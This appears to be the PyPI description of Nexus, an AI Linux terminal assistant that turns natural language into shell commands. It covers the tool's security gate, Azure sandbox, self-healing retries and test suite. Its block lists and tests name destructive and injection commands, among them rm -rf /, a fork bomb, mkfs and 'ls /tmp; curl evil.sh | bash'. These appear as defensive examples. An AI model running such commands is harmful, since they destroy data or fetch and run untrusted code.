An intelligent, terminal-based AI Linux assistant.

These details have been verified by PyPI

Project links

GitHub Statistics

Maintainers

These details have not been verified by PyPI

Project description

Nexus - AI-Powered Linux Assistant

Nexus is an intelligent, terminal-based Linux assistant that combines multiple AI models, memory systems, and automation capabilities to help you manage your system, browse the web, and execute complex tasks through natural language.

Key Features

Multi-Brain AI Architecture - Specialized models for different tasks
Autonomous Web Browsing - Automated tasks with browser-use
Persistent Memory - RAG via Supermemory (bring your own API key; snippets stay in your account — see Onboarding & Supermemory)
Self-Healing Execution - Auto-fix failed commands and auto-failover LLM routing
Resilient Command Generation - Retries transient API errors (429, timeouts) per provider, then falls back to alternate models; empty replies do not block the chain
Intelligent Intent Recognition - Context-aware decision making (including DIRECT_EXECUTE for simple one-shot shell tasks)
Security First - AST + regex gate before execution: strict rm -rf / heuristics, path allowlists for read / FILE_READ / home-scoped FILE_WRITE (subtree checks, not string prefixes), FTP credential / anonymous-FTP patterns blocked in strict mode, mandatory confirmation for risky/sudo commands
Ephemeral Azure Sandboxing - User-controlled cloud sandbox for running untrusted or risky commands safely
Runtime settings - /settings in the TUI to inspect models and keys, switch chat / router / browser models (same catalog as first-run onboarding), and update API keys with optional .env sync

Maturity snapshot (March 2026)

Nexus is best described as production-leaning for a power-user TUI: the execution stack (planner, executor, security gate, audit log, self-heal loop, LLM fallbacks) is well tested (198 automated pytest cases) and hardened from real failure modes (rate limits, bad JSON plans, sudo/interactive edge cases). Distribution ships without embedded API keys; users supply keys via onboarding or environment. Remaining risk is mostly product surface area: no automatic rollback checkpoints yet, FILE_WRITE always replaces whole files (no first-class append/patch action), and plans are still sequential. For AppImage + desktop integration, the planner encodes a full procedure (extract, icon, FILE_WRITE .desktop, update-desktop-database, Electron --no-sandbox); extraction of large images can take many minutes and is supported with an extended subprocess timeout.

Architecture Overview

Nexus follows a modular, multi-brain architecture where different AI models handle specialized tasks:

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph TB
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "User Interface Layer"
        TUI[Terminal UI<br/>Rich Console + Prompt Toolkit]
        CLI[CLI Commands<br/>Typer Framework]
    end

    subgraph "Intelligence Layer - Multi-Brain System"
        Router[Decision Engine<br/>Groq: Kimi K2]:::secondary
        Chat[Chat Brain<br/>OpenRouter: GPT / Groq: Kimi]:::tertiary
        Planner[Task Planner<br/>Primary LLM Client]:::tertiary
        CmdGen[Command Generator<br/>Primary LLM Client]:::tertiary
    end

    subgraph "Memory System"
        Memory[Supermemory<br/>RAG + Context Storage]:::highlight
    end

    subgraph "Execution Layer"
        Orchestrator[Orchestrator<br/>Multi-Step Task Execution]:::purple
        Executor[Command Executor<br/>Safety Checks + Confirmation]
        Browser[Browser Manager<br/>browser-use + API Key Rotation]:::purple
        Package[Package Manager<br/>apt/dnf/pacman]
    end

    subgraph "Core Services"
        Config[Config Manager<br/>~/.config/nexus]
        System[System Detector<br/>OS + Package Manager]
        Security[Security Module<br/>Command Validation]
    end

    TUI --> Router
    CLI --> Router
    Router --> Chat
    Router --> Planner
    Router --> CmdGen

    Chat --> Memory
    Planner --> Memory
    CmdGen --> Memory

    Planner --> Orchestrator
    CmdGen --> Executor

    Orchestrator --> Browser
    Orchestrator --> Executor

    Executor --> Security
    Browser --> Executor
    Package --> Executor

    Config --> System
    System --> Package

AI Model Usage Map

Nexus uses different AI models for different purposes, creating a specialized "multi-brain" system. Defaults below are the usual out-of-the-box choices; you can override chat, router, and browser models via Settings and default models (onboarding step 3 or /settings model).

Component	Model Used	Purpose	Why This Model?
Router / Decision Engine	Groq: Kimi K2 (`moonshotai/kimi-k2-instruct-0905`)	Fast intent classification & routing	Ultra-fast inference (Groq), robust decision framework
Chat Brain	OpenRouter: GPT (default) or Groq: Kimi	Natural language conversations	Best reasoning & context understanding
Command Generator	Primary LLM Client	Convert natural language → shell commands	Strong code generation capabilities
Task Planner	Primary LLM Client	Break complex tasks into steps	Strategic thinking & planning with smart CHECK logic
Browser Agent	Gemini Flash (`gemini-flash-latest`)	Web automation & navigation	Vision support + fast inference for UI understanding
Search Tool	Gemini 2.5 Flash	Web search with citations	Native Google Search integration

Model Priority & Auto-Failover System

Nexus implements a robust failover chain for critical components to ensure maximum uptime, seamlessly bypassing API rate limits (e.g. 429 errors from free-tier models).

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph LR
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "Decision/Router Brain"
        R1[Groq: Kimi K2]:::secondary --> R2[Fallback to Chat Brain]
    end

    subgraph "Chat & Planner Priority (Auto-Failover)"
        C1[OpenRouter: GPT]:::tertiary --> C2[Groq: Kimi] --> C3[Google: Gemini] --> C4[Mock Mode]
    end

    subgraph "Specialized Tasks"
        S1[Browser: Gemini Flash]:::purple
        S2[Video: Gemini 2.5 Flash]:::highlight
        S3[Search: Gemini 2.5 Flash]:::tertiary
    end

    R2 --> C1

System Flow Diagrams

1. User Input Processing Flow

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant TUI
    participant DecisionEngine
    participant Router as Router Brain<br/>(Groq: Kimi)
    participant ChatBrain
    participant Orchestrator
    participant Executor

    User->>TUI: Input text
    TUI->>DecisionEngine: analyze(input)

    alt Fast Path: Heuristic Match
        DecisionEngine->>DecisionEngine: Regex patterns<br/>(install, remove, update)
        DecisionEngine-->>TUI: Intent(COMMAND)
    else Slow Path: AI Analysis
        DecisionEngine->>Router: Classify intent
        Router-->>DecisionEngine: JSON response
        DecisionEngine-->>TUI: Intent(COMMAND/CHAT/PLAN)
    end

    alt Action: COMMAND
        TUI->>Executor: Execute command
        Executor-->>User: Result
    else Action: CHAT
        TUI->>ChatBrain: generate_response()
        ChatBrain-->>User: Response
    else Action: PLAN
        TUI->>Orchestrator: execute_plan()
        Orchestrator-->>User: Multi-step execution
    end

2. Complex Task Orchestration Flow

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant Orchestrator
    participant Planner
    participant Memory
    participant Browser
    participant Executor

    User->>Orchestrator: "Install Postman"
    Orchestrator->>Planner: create_plan(request)

    Planner->>Memory: Query proven plans
    Memory-->>Planner: RAG context

    Planner->>Planner: Generate step-by-step plan
    Planner-->>Orchestrator: [CHECK, BROWSER, TERMINAL]

    loop For each step
        alt Step: CHECK
            Orchestrator->>Executor: which postman
            alt Already installed
                Executor-->>Orchestrator: Exit code 0
                Orchestrator-->>User: Already installed, skipping
            else Not found
                Executor-->>Orchestrator: Exit code 1
                Orchestrator->>Orchestrator: Continue to next step
            end
        else Step: BROWSER
            Orchestrator->>Browser: Download Postman
            Browser-->>Orchestrator: File path
        else Step: TERMINAL
            Orchestrator->>Executor: Install downloaded file
            Executor-->>Orchestrator: Success/Failure
        end

        alt Step failed
            Orchestrator->>Planner: reflect_and_fix(error)
            Planner-->>Orchestrator: Fixed command
            Orchestrator->>Executor: Retry
        end
    end

    Orchestrator->>Memory: Save successful plan
    Orchestrator-->>User: Task complete

3. Dual-Stage Self-Healing Execution Flow

Nexus employs a resilient two-stage self-healing system that attempts to recover failing commands up to 3 times before safely halting to prevent system corruption.

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant Orchestrator
    participant Executor
    participant LocalHealer as Local Heuristic Matcher
    participant LLMHealer as LLM Self-Healer (Groq/OpenRouter)

    Orchestrator->>Executor: Execute step
    Executor-->>Orchestrator: Exit Code != 0 (Failed)

    %% Stage 1
    Orchestrator->>LocalHealer: Check for common errors (e.g. "command not found")
    alt Is "command not found"?
        LocalHealer-->>Orchestrator: Return fast auto-install command (e.g., apt install docker.io)
    else Complex Error
        %% Stage 2
        Orchestrator->>LLMHealer: reflect_and_fix(failed_command, error_output)
        Note over LLMHealer: Analyzes context as Senior DevOps

        alt Fixable Error
            LLMHealer-->>Orchestrator: Return raw, corrected bash command
        else Unfixable/Dangerous
            LLMHealer-->>Orchestrator: Return "UNFIXABLE"
        end
    end

    alt Got Fix
        Orchestrator->>Executor: Retry with corrected command (max 3 times)
        Executor-->>Orchestrator: Success or Failure
    else "UNFIXABLE" or Max Retries Hit
        Orchestrator->>Orchestrator: Halt execution safely to protect system state
    end

3.5 Ephemeral Azure Sandboxing (`AZURE_RUN`)

Nexus includes an interactive, user-controlled cloud sandbox powered by Azure Container Instances. Instead of silently routing commands to the cloud, Nexus flags commands that could fetch or execute external code and gives you an explicit choice.

Trigger keywords: git clone, wget, curl, bash -c, sh -c, tar -x, make install, ./configure

What you see when a flagged command is about to run:

⚠️  Security Alert: This command fetches or compiles external code.
Command: git clone https://github.com/some-repo.git

Do you want to securely sandbox this in Azure instead of running it locally? (y/N):

Enter (No) → Runs directly on your local machine as normal. Use this for trusted repos like every day.
y (Yes) → Nexus hot-swaps the action to AZURE_RUN:

%%{init: {"themeVariables": {"fontFamily": "monospace", "actorBkg": "#fff", "actorBorder": "#333", "actorTextColor": "#333", "noteBkg": "#ffe600", "noteBorderColor": "#333", "noteTextColor": "#333", "activationBorderColor": "#333", "activationBkgColor": "#ff4949"}}}%%
sequenceDiagram
    participant User
    participant Nexus
    participant Azure as Azure Container Instances

    Nexus->>User: Security Alert prompt (y/N)
    User->>Nexus: y (sandbox it)
    Nexus->>Azure: Create Ubuntu 22.04 container
    Azure-->>Nexus: Container provisioned
    Nexus->>Azure: apt-get install git curl wget build-essential python3 nodejs cmake...
    Nexus->>Azure: Run user command (base64 piped to bash, no nested eval quote bug)
    Azure-->>Nexus: Stream stdout/stderr logs in real time
    Nexus-->>User: Display output
    Nexus->>Azure: Delete container (permanent)
    Note over Azure: Container nuked. Your laptop untouched.

Implementation: Every sandboxed command (not only git — also curl, wget, bash -c, pipes, && chains, etc.) is UTF-8 base64-encoded inside the container command-line and piped through base64 -d | bash, so the full script runs verbatim. That avoids an older bug where eval + shlex.quote(cmd) sat inside a single-quoted bash -c '…' string — inner quotes terminated the outer literal early and could reduce a long command to the first token only (e.g. bare git). Obviously incomplete one-liners (empty, bare curl, bash -c with no script, …) are refused before a container is created.

Design principle: Nexus does not decide if something is "sketchy" for you. It acts as a firewall checkpoint — you stay in control.

True Capacity: The DevOps & Sysadmin Engine

Nexus isn't just a chatbot; it runs in completely isolated environments utilizing powerful, one-liner sysadmin tools.

Docker Mastery: Ask Nexus to "keep docker tidy" or "kill all exited containers". It understands how to pipe docker ps -q to docker rm and uses pkill reliably.
Service Management (SERVICE_MGT): When interacting with systemd/services (e.g. "restart nginx"), Nexus executes the restart and then automatically runs systemctl status in the background to ensure it didn't crash on boot—skipping to self-healing if the check fails.
Safe Failure: If self-healing a step fails 3 times, Nexus deliberately stops execution. It refuses to stumble blindly into the next step of a plan if the preceding requirements weren't met, preserving the integrity of your Linux system.

4. Memory System Integration

%%{init: {"themeVariables": {"fontFamily": "monospace"}}}%%
graph TB
    classDef default fill:#fff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef highlight fill:#ffe600,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef secondary fill:#ff4949,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef tertiary fill:#49baff,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    classDef purple fill:#c77ae8,stroke:#000,stroke-width:3px,color:#000,font-weight:bold;
    subgraph "Input Sources"
        UserReq[User Requests]
        CmdResult[Command Results]
        Plans[Successful Plans]
        SysInfo[System Context]
    end

    subgraph "Supermemory Storage"
        Memory[(Supermemory<br/>Vector Database)]:::highlight
    end

    subgraph "RAG Retrieval"
        Query[Query Memory]:::highlight
        Context[Enrich Prompts]:::highlight
    end

    subgraph "AI Components"
        Chat[Chat Brain]
        CmdGen[Command Generator]
        Planner[Task Planner]
    end

    UserReq --> Memory
    CmdResult --> Memory
    Plans --> Memory
    SysInfo --> Memory

    Chat --> Query
    CmdGen --> Query
    Planner --> Query

    Query --> Memory
    Memory --> Context
    Context --> Chat
    Context --> CmdGen
    Context --> Planner

Component Details

AI Clients (`src/jarvis/ai/`)

`llm_client.py` - LLM Abstraction Layer

LLMClient (Abstract Base): Memory integration, prompt enrichment
GoogleGenAIClient: Gemini models with Google Search grounding
OpenRouterClient: Access to GPT models via OpenRouter
GroqClient: Ultra-fast inference for routing decisions
MockLLMClient: Fallback when no API keys configured

`command_generator.py` - Natural Language → Shell Commands

Converts user requests to executable shell commands
Uses RAG to retrieve proven solutions from memory (queries use the primary client’s memory; successful generations are recorded on whichever LLM client actually produced the command, including fallbacks)
Retries transient provider failures on the same model (with backoff), then tries fallback clients; treats empty model output as retryable
Implements safety guidelines and idempotency principles (SafetyCheck before return)

`decision_engine.py` - Intent Classification

Fast Path: Regex-based heuristics for common commands
Slow Path: LLM-based intent analysis with robust examples
Routes to: COMMAND, CHAT, PLAN, SEARCH, BROWSE

`memory_client.py` - Supermemory Integration

BYOK: Each user sets SUPERMEMORY_API_KEY (env) or saves a key during onboarding — memories are stored in that user’s Supermemory project, not a shared vendor key inside the package.
Stores (plain text to the API): system context snippets, command feedback, task logs, planner-related context — see Onboarding & Supermemory.
Retrieves: Relevant context for RAG-enhanced prompts
Enables learning from past successes/failures

Core Systems (`src/jarvis/core/`)

`orchestrator.py` - Multi-Step Task Execution

Planner: Breaks complex requests into steps (CHECK → BROWSER → TERMINAL → FILE_WRITE / FILE_READ / FILE_SEARCH / …)
Smart Resume: Checks if files already exist before downloading
Self-Healing: Auto-fixes failed commands using LLM reflection plus fast local heuristics (e.g. wrong package manager for .deb/.AppImage, mkdir -p when stderr shows missing paths — uses pathlib + shlex.quote, not fragile string splits)
FILE_WRITE: Writes full file contents (overwrite). Paths under your home directory use Python write_text (no sudo); system paths use sudo mkdir -p + sudo tee. Userland vs sudo paths share _file_write_via_userland / _file_write_via_sudo_tee so the main executor and the self-heal retry stay consistent. Failed writes retry once with mkdir / sudo (see self-heal block). There is no FILE_APPEND yet — to append (e.g. a line in ~/.zshrc), the planner typically uses a TERMINAL step (echo '…' >> ~/.zshrc) which is subject to normal shell safety checks and confirmation.
AppImage / desktop flow (planner-guided): chmod + copy to ~/.local/bin, --appimage-extract inside mktemp -d /tmp/nexus-appimg.XXXXXX (avoids squashfs-root collisions across concurrent plans), copy icon, FILE_WRITE a fresh ~/.local/share/applications/*.desktop (not the squashfs copy — wrong Exec/Icon), update-desktop-database, and for Electron/Chromium bundles --no-sandbox on Exec=. Residual gap: icons remain best effort from a shallow find.
Live UI: Real-time progress tracking with Rich tables

`executor.py` & `security.py` — Safe Command Execution

AST-Based Command Validation: Deep analysis of shell syntax to catch obfuscated attacks (e.g. eval, cd / && rm -rf *).
Strict blacklist filtering (blocks rm -rf /, mkfs, fork bombs :(){ :|:& };:).
rm -rf / heuristics use horizontal-whitespace-aware patterns so /tmp/…, /var/tmp/…, and wrapped lines are not false positives.
Path allowlist (SafetyCheck.is_path_within_any_root): CLI read, orchestrator FILE_READ, and home-scoped FILE_WRITE require resolved paths to lie under home and/or cwd using Path.relative_to, avoiding /home/user2/… false “under /home/user” bugs from naive str.startswith.
FTP (strict mode): Commands embedding passwords in ftp://user:pass@…, wget --ftp-password=…, lftp -u user,pass, or common anonymous FTP forms are rejected (same strict path as other dangerous-pattern warnings). Normal docker, psql, postgresql://… URLs are unaffected.
User confirmation mandatory for dangerous or sudo operations.
Scoped shell=True: Only activates when genuine pipeline operators (&&, |, ;, >) are detected — prevents injection when the command is a simple binary call.
Zeroized sudo password: Stored as bytearray in memory and byte-by-byte zeroed on auth failure — never held as a Python str that GC might retain.
Persistent Audit Log (~/.nexus/audit.log, chmod 600): Every executed, skipped, or rejected command is logged with timestamp, return code, user-confirmed Y/N, and stdout/stderr excerpts.
Dry-run mode support.

`config_manager.py` - Configuration Management

Stores API keys, preferences in ~/.config/nexus/config.json (file mode 0o600 on save)
Environment variable overrides (on load) for keys such as OPENROUTER_API_KEY, GOOGLE_API_KEY, etc.
Onboarding state tracking
Optional default models (written by onboarding step 3 or /settings): chat_model, router_model, browser_model — see Settings and default models
update() persists to config.json and, when a project .env file exists, syncs known API key fields to matching env vars (same mapping as onboarding/settings key flows)

`system_detector.py` - OS Detection

Detects: Ubuntu, Debian, Fedora, Arch, etc.
Identifies package manager: apt, dnf, pacman
Provides system context to AI models

Modules (`src/jarvis/modules/`)

`browser_manager.py` - Web Automation

Local Mode: browser-use library with Playwright (headless=false for live view)
Cloud Mode: BrowserUse SDK for headless execution
Smart download handling (~/Downloads tracking)
LLM: Gemini (default gemini-2.5-flash) or OpenRouter (openai/gpt-oss-120b:free) depending on keys; optional browser_model from config when it matches the active provider (see Settings and default models)

`package_manager.py` - System Package Management

Unified interface for apt/dnf/pacman
Install, remove, update operations
Automatic sudo handling

UI Layer (`src/jarvis/ui/`)

`console_app.py` — Terminal User Interface

Rich Console: Panels, tables, markdown rendering
Prompt Toolkit: Async input with syntax highlighting
Persistent Session (~/.nexus/session.json): Context-aware responses that survive restarts; last 24h of history restored on launch
Command Handlers: /browse, /search, /find, /read, /do, package commands, /settings (show, help, model, key), /status, /think, etc.

`model_catalog.py` — Shared task ↔ model catalog

Single source of truth for which model IDs are valid per task (chat, router, browser) and which Nexus config key unlocks each provider
Used by onboarding (default model picks), /settings model, and startup when applying saved chat_model / router_model

`onboarding.py` - First-Run Setup

Collects API keys (Google, OpenRouter, Groq, optional Anthropic)
Optional Supermemory enablement (BYOK)
Step 3 — Default models: numbered menus built from the same catalog as /settings model (per task, only for providers you configured in step 1); choosing “built-in default” leaves the corresponding *_model field unset
Saves to ~/.config/nexus/config.json (no keys are bundled with the app)

Onboarding & Supermemory (BYOK)

First-run setup explains that Nexus Memory is optional and uses your Supermemory project:

If SUPERMEMORY_API_KEY is already set (or a key exists in saved config), onboarding reports it and asks whether to enable RAG (default: on).
If not set, memory defaults off; users can opt in and paste their own key (stored locally next to other keys).
Shipping: Release artifacts should not embed a shared Supermemory or LLM key — users supply fuel (keys) after install.

Installation

Install from PyPI (recommended)

The distribution on PyPI is nexus-linux-assistant (the name nexus is already used by another package). The CLI command is still nexus.

pip install "nexus-linux-assistant[all]"
playwright install chromium   # needed for /browse
nexus                           # first run: onboarding + BYOK keys → ~/.config/nexus/

Optional isolated install: pipx install "nexus-linux-assistant[all]" then ensure playwright browsers are installed in that environment or on your PATH as you prefer.

Install from a GitHub Release tarball

Replace VERSION with the tag (for example 0.1.0 for tag v0.1.0). Artifact names use underscores (nexus_linux_assistant).

VERSION=0.1.0
curl -LO "https://github.com/Garvit1000/nexus/releases/download/v${VERSION}/nexus_linux_assistant-${VERSION}.tar.gz"
pip install "nexus_linux_assistant-${VERSION}.tar.gz[all]"
playwright install chromium
nexus

No .env is included in the package; use onboarding or /settings key, or create your own .env if you want env-based config.

Prerequisites

Python 3.10 or higher
Supported OS: Ubuntu, Debian, Fedora, Arch Linux

Setup

Clone the repository:

   git clone <repository-url>
   cd nexus

Create virtual environment:

   python3 -m venv .venv
   source .venv/bin/activate

Install package with all dependencies:

   pip install -e ".[all]"

What [all] installs: Core TUI + AI providers (Google Gemini, OpenAI, LangChain) + browser automation (Playwright). This is what you need for full functionality.

Optional extras (for specific use cases):

pip install -e ".[ai]"      # Core + AI providers only (no browser)
pip install -e ".[browser]" # Core + browser automation only
pip install -e ".[dev]"     # Core + pytest (for running tests, no AI/browser)
pip install -e "."          # Core only (TUI shell, no AI or browser)

Install Playwright browsers (required for web automation):

   playwright install chromium

Configure API keys (all BYOK — nothing is embedded in the package):

   cp .env.example .env
   # Edit .env and add your API keys

Or rely on SUPERMEMORY_API_KEY, OPENROUTER_API_KEY, etc. in the environment.

Run onboarding (first-time only):

   nexus

Global Access

Add to ~/.bashrc or ~/.zshrc:

alias nexus='/path/to/nexus/.venv/bin/nexus'

Usage

Interactive Mode (TUI)

nexus

Launches the full Terminal UI with decision engine, memory, and all features.

Settings and default models

Nexus keeps one catalog of allowed models per task (src/jarvis/core/model_catalog.py). Onboarding step 3 and the TUI command /settings model both draw from it, so first-run choices stay consistent with what you can change later in the app.

Mechanism	What it does
`/settings`	Summary panel: active models (chat, router, browser, search), fallbacks, memory, executor mode, route-cache stats when available
`/settings help`	Subcommands, examples, and provider aliases
`/settings model`	Interactive picker (arrow keys) or direct form: `/settings model chat <model_id>` — may switch which provider instance is primary when the model belongs to another client in the failover chain
`/settings key`	Update a key: interactive list from `.env` keys (if present) or `provider value` — updates `config.json`, syncs mapped vars to `.env` when the file exists, and refreshes in-memory SDK clients where supported

Persisted fields in ~/.config/nexus/config.json:

chat_model, router_model, browser_model — optional strings; unset means “use each client’s built-in default”
On startup, main.py applies chat_model / router_model via the same rules as /settings model. Browser uses browser_model only when it matches the active browser provider (Google vs OpenRouter); otherwise the safe default for that SDK is used.

Edge cases (by design):

Unknown model IDs in config (typos or manual edits) are ignored at startup so the wrong provider is not given another provider’s model string.
If router and primary chat are the same client instance (e.g. Groq-only setups), applying both chat_model and router_model would fight over one .model; after chat_model is applied, router_model is skipped on that shared instance so the chat choice wins.
Model env vars are not read for chat_model / router_model / browser_model — only config.json (and what onboarding/settings write there).

CLI Commands

Chat

nexus chat "How do I check disk space?"

Package Management

nexus install htop
nexus remove firefox
nexus update

Natural Language Execution

nexus do "find all python files larger than 1MB"

Browser Automation

nexus browse "Find MrBeast on YouTube"
nexus browse --cloud "Download latest Chrome .deb"

Web Search

nexus search "best restaurants in Dubai"

Testing

Nexus ships with 198 automated pytest tests across 10+ test files, covering every critical code path. Run them anytime:

# Install dev dependencies (first time only)
pip install -e ".[dev]"

# Run all tests
pytest

# Run with verbose output
pytest -v

# Run a single test file
pytest tests/test_executor.py -v

Test Coverage Map

`tests/test_security.py` — 32 tests

What it checks: The CommandValidator and SafetyCheck layer that sits before every command execution.

Test Group	Checks
`TestCommandValidatorBlocked`	`rm -rf /` and fork bombs are hard-blocked and return `is_valid=False`
`TestCommandValidatorWarnings`	`curl ... \| sh` is allowed but raises a warning; `ls` has zero warnings
`TestCommandValidatorSyntax`	Mismatched quotes and unbalanced parentheses are caught as syntax errors
`TestSafetyCheckIntegration`	`SafetyCheck.check_command()` raises `SecurityViolation` on blocked commands, returns `True` on safe ones
`TestSudoDetection`	`apt`, `systemctl`, writing to `/etc/` are correctly flagged as requiring sudo; `chmod` on user paths is not forced interactive
`TestRmRfHeuristics`	`rm -rf /tmp/...` and similar are not misread as `rm -rf /`; newline after `/` does not false-positive
`TestPathWithinRoots`	File read/write allowlists use proper path subtrees (e.g. `/home/user2` is not under `/home/user`)
`TestFtpSecurity`	FTP passwords in URLs, `wget --ftp-password`, `lftp -u user,pass`, and anonymous FTP are rejected in strict mode

Why it matters: This is the last line of defence against AI-hallucinated destructive commands. If this breaks, Nexus could execute rm -rf / without user confirmation.

`tests/test_audit_logger.py` — 8 tests

What it checks: The forensic audit log written to ~/.nexus/audit.log.

Test Group	Checks
`TestAuditLogCreation`	Log file is created on construction; file permissions are `0o600` (owner-only read/write)
`TestAuditLogEntries`	Successful commands log `STATUS=OK`; failures log `STATUS=FAIL(rc)`; unconfirmed logs `CONFIRMED=NO(auto)`; stdout excerpts are included; skipped commands log `STATUS=SKIPPED`; multiple entries append correctly

Why it matters: The audit log is the only tamper-evident record of what Nexus ran on your machine. These tests guarantee: (1) the log file is private — other users on a shared machine can't read it, (2) every code path (success, failure, skip) leaves a trace, (3) you can always reconstruct what happened if something breaks.

`tests/test_executor.py` — 18 tests

What it checks: The CommandExecutor — the central class that runs every shell command.

Test Group	Checks
`TestExecutorSafeCommands`	`echo` returns RC=0 and correct stdout; `false` returns RC≠0; pipelines work
`TestExecutorBlockedCommands`	`rm -rf /` and fork bombs return RC=-1 without executing; blocked commands write SKIPPED to audit log
`TestExecutorDryRun`	Dry-run returns RC=0 without touching disk; `touch` doesn't create a file; audit log shows SKIPPED
`TestExecutorAuditIntegration`	Successful and failed executions both write entries to the audit log
`TestExecutorSudoPasswordClearing`	`bytearray` is zeroed on auth failure (`incorrect password` in stderr); password cache is never a plain `str`
`TestShellModeScoping`	Simple commands use `shell=False` + list args; commands with `\|` use `shell=True` + string

Why it matters: The executor is the most security-critical component — it's where commands actually run. The shell=True scoping test is particularly important: it verifies that a prompt like ls /tmp can't be silently turned into ls /tmp; curl evil.sh | bash through shell expansion.

`tests/test_planner.py` — 12 tests

What it checks: The Planner class that converts natural language into structured TaskStep lists.

Test Group	Checks
`TestPlannerParsing`	Valid JSON produces correct `TaskStep` objects with right fields; multi-step plans parse all steps; IDs are sequential (1, 2, 3…); malformed JSON returns `[]`; markdown code fences (```json) are stripped before parsing
`TestPlannerFallback`	Fallback LLM client is tried when primary raises an exception; all clients failing returns `[]`; `time.sleep` is called with a delay ≥ 2.0s between attempts (exponential backoff)

Why it matters: If the Planner silently returns a broken plan (wrong step types, missing commands), the orchestrator will execute garbage. The markdown fence test caught a real bug — LLMs sometimes wrap JSON in code blocks that need stripping. The backoff test verifies that a 429 rate-limit doesn't cause all fallback clients to be hammered simultaneously.

`tests/test_decision_engine.py` — 13 tests

What it checks: The DecisionEngine — Nexus's "brain" that classifies user input into intents.

Test Group	Checks
`TestHeuristicFastPath`	`"update"`, `"install git"`, `"remove nginx"`, `"uninstall docker"` resolve without calling the LLM (asserts `generate_response` was never called); `"Install Vim"` works case-insensitively
`TestSlowPathLLM`	Ambiguous inputs like `"keep docker tidy"` fall through to the router LLM; the returned action from the LLM is used
`TestSessionContextAwareness`	When session manager returns recent context, `SHOW_CACHED` is returned immediately (no LLM call); when context is `None`, the engine falls through normally

Why it matters: The fast-path tests guarantee that common commands never waste an LLM API call (100ms → <1ms). The slow-path tests ensure that ambiguous requests don't silently default to the wrong action. The session tests verify that Nexus correctly answers "what did you just do?" from memory rather than re-querying the AI.

`tests/test_config_manager.py` — 13 tests

What it checks: Config persistence, environment variable overrides, corrupted file recovery, and file permissions.

`tests/test_model_catalog.py` — 6 tests

What it checks: Shared onboarding/settings catalog (key_flags_from_onboarding, choices_for_task, resolve_provider_for_model), apply_stored_task_models (primary brain switch, unknown model skipped, shared chat/router client behavior).

`tests/test_session_manager.py` — 29 tests

What it checks: Turn tracking, history trimming, context reference detection (pronouns, temporal markers), semantic relatedness filtering to prevent false-positive cache hits, and session summary generation.

`tests/test_command_generator.py` — 16 tests

What it checks: LLM response cleanup (markdown fences, backticks, whitespace), SafetyCheck validation on generated commands, memory integration (RAG query + feedback storage), and fallback / retry behavior (429-style errors, empty responses, deduped clients).

`tests/test_llm_client.py` — 11 tests

What it checks: Base LLMClient prompt enrichment (memory prepend, skip, double-enrichment guard, exception handling), MockLLMClient fallback, and search() raising NotImplementedError.

`tests/test_package_manager.py` — 22 tests

What it checks: Package name validation (rejects shell injection via ;, |, `, $()), correct install/remove/update commands for APT/DNF/Pacman, and graceful handling of unknown package managers.

`tests/test_orchestrator.py` — 24 tests

What it checks: Missing binary extraction (4 regex patterns), self-healer (_PKG_ALIAS mapping, injection protection, LLM fallback, UNFIXABLE handling), plan view rendering, execute_plan (empty plan, user cancellation, terminal step execution), Azure AZURE_RUN (_azure_bootstrap_command_line base64 round-trip for any shell line; _azure_run_preflight rejects empty/bare git/curl/… stubs).

CI / Continuous Integration

Tests run automatically on every push via GitHub Actions (.github/workflows/ci.yml):

Python 3.10, 3.11, 3.12 (matrix build)
[dev] and [all,dev] extras tested in CI
Lint job: ruff check, ruff format --check, pip-audit --strict
Branches: main, mvp

Advanced Features

Memory System

Nexus remembers:

System Context: OS, package manager
Command Feedback: Success/failure of past commands
Proven Plans: Multi-step tasks that worked
User Preferences: Learned from interactions

Multi-Step Task Planning

Example: "Install Postman"

CHECK: which postman (idempotency)
BROWSER: Download from official site
TERMINAL: Extract and install

Self-Healing & Fallback Execution

Nexus is built to gracefully handle failures at both the software and API level:

Auto-Failover LLM Routing with Backoff: If the primary AI model hits a rate limit (429) during planning, Nexus waits 2^n + jitter seconds (exponential backoff) before routing to the next fallback model (e.g., OpenRouter → Groq → Gemini) — prevents cascade failures under burst load.
3-Attempt AI Self-Healer: If a terminal command fails, Nexus suspends the Live UI, passes stderr/stdout to reflect_and_fix (LLM acting as Senior DevOps Engineer), retries the healed command, and on continued failure feeds the error from each attempt back to the AI with accumulated context for deeper diagnosis. If the AI returns UNFIXABLE, the plan halts cleanly.
